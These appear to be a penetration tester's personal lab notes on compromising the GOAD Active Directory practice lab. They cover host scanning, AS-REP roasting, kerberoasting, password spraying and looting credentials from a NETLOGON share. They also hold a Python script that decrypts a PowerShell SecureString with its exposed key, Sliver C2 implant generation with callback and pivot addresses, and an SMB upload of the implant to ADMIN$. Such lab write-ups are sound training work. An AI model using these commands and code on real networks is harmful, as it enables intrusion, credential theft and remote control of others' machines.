## Outcomes
- Find an initial vulnerable target
- Map out infrastructure, domains, machines, DCs
## Parked Ideas
- Dump SYSVOL for `samwell.tarly`
- start doing bloodhound
- `sansa.stark` hash from kerberoasting is currently unused
- ditto for `sql_svc`
- take a look at the encrypted secret at: `/targets/goad/north-sevenkingdoms-local/users/arya.stark/loot`
## Recon
### Initial Host ping
```
╭─[λ]-[/targets/goad]-[]
╰─> nmap -sn 192.168.56.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-16 07:17 EDT
Nmap scan report for 192.168.56.10
Host is up (0.050s latency).
Nmap scan report for 192.168.56.11
Host is up (0.042s latency).
Nmap scan report for 192.168.56.12
Host is up (0.042s latency).
Nmap scan report for 192.168.56.22
Host is up (0.050s latency).
Nmap scan report for 192.168.56.23
Host is up (0.050s latency).
Nmap scan report for 192.168.56.100
Host is up (0.041s latency).
Nmap done: 256 IP addresses (6 hosts up) scanned in 3.89 seconds
```
### Netexec host enumeration
Mostly interested in gaining intel on hostnames etc. here.
![[Pasted image 20250316122023.png]]
### Users
![[Pasted image 20250316124339.png]]
```
samwell.tarly:Heartsbane
```
## `samwell.tarly`
- [x] check winrm access
- [ ] dump sysvol share
- [x] rid-brute
  - yields additional users, appended to `users.txt`
### Shares
![[Pasted image 20250316124909.png]]
Possibly IPC share?
### [[AS-REP Roasting]]
## `brandon.stark`
AS-REP roasting + cracking yields password: `iseedeadpeople`.
- [ ] SMB
- [ ] Check SYSVOL
- [x] winrm - no love
- has public READ,WRITE on castleblack SMB
  - permission denied for PUT and listing
    - this indicates that NTFS file system ACLs don't grant us access at all
- kerberoasting yields a ton of hashes
  - one cracks for `jon.snow:iknownothing`
## `jon.snow`
- no winrm
- SMB
  - `all` share w. `R:W`
  - `public` share w. `R:W` on Castleblack
  - `smbclient //castleblack/all -U jon.snow%iknownothing`
    - reveals `arya.txt`
```
╭─[λ]-[/targets/goad/north-sevenkingdoms-local]-[]
╰─> cat arya.txt
Subject: Quick Departure
Hey Arya,
I hope this message finds you well. Something urgent has come up, and I have to leave for a while. Don't worry; I'll be back soon.
I left a little surprise for you in your room – the sword You've named "Needle." It felt fitting, given your skills. Take care of it, and it'll take care of you.
I'll explain everything when I return. Until then, stay sharp, sis.
Best,
John#
```
We'll append `Needle` to our `passwords.txt` and rerun the password spray.
- we get a hit on `winterfell` for `arya.stark:Needle`
## `arya.stark`
- SMB
  - no interesting shares (SYSVOL)
  - can read NETLOGON share on [[winterfell]]
- winrm
  - no love
### Dumping [[SMB Share - NETLOGON]]
Share contains:
- `script.ps1`
- `secret.ps1`
```
╭─[λ]-[/targets/goad/north-sevenkingdoms-local/users/arya.stark/loot]-[]
╰─> cat script.ps1
# fake script in netlogon with creds
$task = '/c TODO'
$taskName = "fake task"
$user = "NORTH\jeor.mormont"
$password = "_L0ngCl@w_"
# passwords in sysvol still ...#
╭─[λ]-[/targets/goad/north-sevenkingdoms-local/users/arya.stark/loot]-[]
╰─> cat secret.ps1
# cypher script
# $domain="sevenkingdoms.local"
# $EncryptionKeyBytes = New-Object Byte[] 32
# [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes)
# $EncryptionKeyBytes | Out-File "encryption.key"
# $EncryptionKeyData = Get-Content "encryption.key"
# Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath "secret.encrypted"
# secret stored :
$keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91
$secret="76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="
# T.L.#
```
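This added Python example (not from the original notes) shows why `secret.ps1` offers no protection: the export is AES-256-CBC, and its key is written three lines above the ciphertext, so anyone who can read NETLOGON can recover the plaintext (the documented PowerShell round-trip is `ConvertTo-SecureString -Key $keyData`). It parses the `ConvertFrom-SecureString -Key` container and decrypts with the `cryptography` package; the only inputs are the key and blob copied from the file above.

```python
import base64
import binascii

# Inputs copied from secret.ps1 above: the 32-byte AES key and the exported SecureString.
KEY_DATA = [177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247,
            41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91]
SECRET = ("76492d1116743f0423413b16050a5345"
          "MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwA"
          "ZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkA"
          "ZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA=")

# Fixed marker that ConvertFrom-SecureString puts in front of every keyed export.
HEADER = "76492d1116743f0423413b16050a5345"


def parse_keyed_securestring(blob):
    """Return (version, iv, ciphertext) from a ConvertFrom-SecureString -Key export.

    Behind the header the export is base64 of a UTF-16LE string
    "<version>|<base64 IV>|<hex AES-CBC ciphertext>"; nothing in it is secret
    except what the key protects.
    """
    if not blob.startswith(HEADER):
        raise ValueError("not a keyed SecureString export")
    body = base64.b64decode(blob[len(HEADER):]).decode("utf-16-le")
    version, iv_b64, ct_hex = body.split("|")
    iv = base64.b64decode(iv_b64)
    ciphertext = binascii.unhexlify(ct_hex)
    if len(iv) != 16 or len(ciphertext) == 0 or len(ciphertext) % 16:
        raise ValueError("malformed IV or ciphertext")
    return version, iv, ciphertext


def decrypt_keyed_securestring(blob, key_bytes):
    """Recover the plaintext when the key is known, as it is when it ships in the same script.

    AES-256-CBC with PKCS7 padding over the UTF-16LE plaintext, via the 'cryptography'
    package (returns None when that package is not installed).
    """
    _, iv, ciphertext = parse_keyed_securestring(blob)
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError:
        return None
    decryptor = Cipher(algorithms.AES(bytes(key_bytes)), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS7 padding: wrong key?")
    return padded[:-pad].decode("utf-16-le")


if __name__ == "__main__":
    version, iv, ct = parse_keyed_securestring(SECRET)
    print(f"format v{version}, IV {iv.hex()}, {len(ct)} ciphertext bytes")
    print("plaintext:", decrypt_keyed_securestring(SECRET, KEY_DATA))
```

A padding error on decrypt means the wrong key was supplied; without the key an observer learns only the IV and the ciphertext length (two AES blocks here, so at most 15 UTF-16 characters).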
Next steps:
- password spray with new pass
- crack the stored secret
- password spray again (keep in mind account lockout)
Password spraying yields:
- `jeor.mormont:_L0ngCl@w_`
## `jeor.mormont`
![[Pasted image 20250316200928.png]]
looks like we are getting into [[castleblack]] now <3
Dude got READ,WRITE on [[SMB Share - ADMIN$]], indicating that he's a member of the Administrators group (makes sense lore-wise).
Next up:
- Remote access shell
- Potentially dump payload into smb share (sliver?) and execute it using psexec or similar
- Start dumping lsass, mimikatz all that stuff
  - keep in mind windows defender is disabled on this one
- can authenticate using `nxc winrm ...` but can't execute commands
- Evil-WinRM doesn't yield a shell either, just kinda hangs until it times out
### Setting up Sliver
- we be piping all our traffic through the jumpbox.
  - i.e. our sliver server will be behind the jumpbox.
  - so how do the sliver agents actually reach the sliver server?
    - one option is to create a tcp pivot agent and deploy it on the jump box
      - have subsequent agents connect to that pivot
    - alternatively we may be able to use the wireguard agents somehow???
    - another option is to figure out how to leverage the jumpbox's wireguard server to route the c2 traffic back to us?
- set up TCP listener on the jumpbox host, seems cleanest
  - gen payload for jumpbox (linux)
    - make sure to use the wireguard network IP for callback
  - gen payload for [[castleblack]], windows, use `generate --tcp-pivot $INTERNAL_JUMPBOX_ADDRESS`
**Generating the jumpbox agent**
```
generate --os linux --skip-symbols --http 10.13.13.2 --name jumpbox
```
**Transfer to jumpbox**
```
scp -i /root/GOAD/workspace/02a4df-goad-azure/ssh_keys/ubuntu-jumpbox.pem ./jumpbox <user>@<jumpbox-address>:/home/goad/agent
```
**Generate payload for [[castleblack]]**
```
generate --os windows --tcp-pivot 192.168.56.100 --name castleblack
```
**Deploy payload to [[castleblack]] via [[SMB Share - ADMIN$]]**:
```sh
nxc smb castleblack -u jeor.mormont -p '_L0ngCl@w_' --put-file /targets/goad/agents/castleblack.exe \\Windows\\Temp\\agent.exe
```
Hit a snag here, payload is too big (1.4 MB).
This leaves me with the following options:
- Reduce payload size (use `--skip-symbols`)
  - no love
- Upload a dropper `.ps1`
  - Execute said dropper using psexec
  - Then execute the payload
- Manually execute a curl/wget command via psexec to download the agent
  - this requires me to either host the payload on the jumpbox
  - or use reverse port forwarding via the sliver agent which has been deployed to the jumpbox
  - or simply use ssh (reverse?) port forwarding (likely the simplest and cleanest approach)
## Lessons Learned
- More AD-related reps
- Wireguard setup and configuration
- More reps on pivoting and port forwarding
- Reps on sliver c2
- Reps for kerberoasting, asreproasting and hash cracking
- Developed a good note and file structure for larger AD engagements
- Improved workflow
- Started diagramming the attack path in obsidian canvas
- Pivoting from broken [[Evil-WinRM]] to psexec
- Learning the disadvantage of bulky sliver payloads (can't put directly onto SMB share)
- Learning about the difference between SMB share and ACL file permissions
  - i.e. a file may be read/write through SMB, but the actual file system permissions may prevent this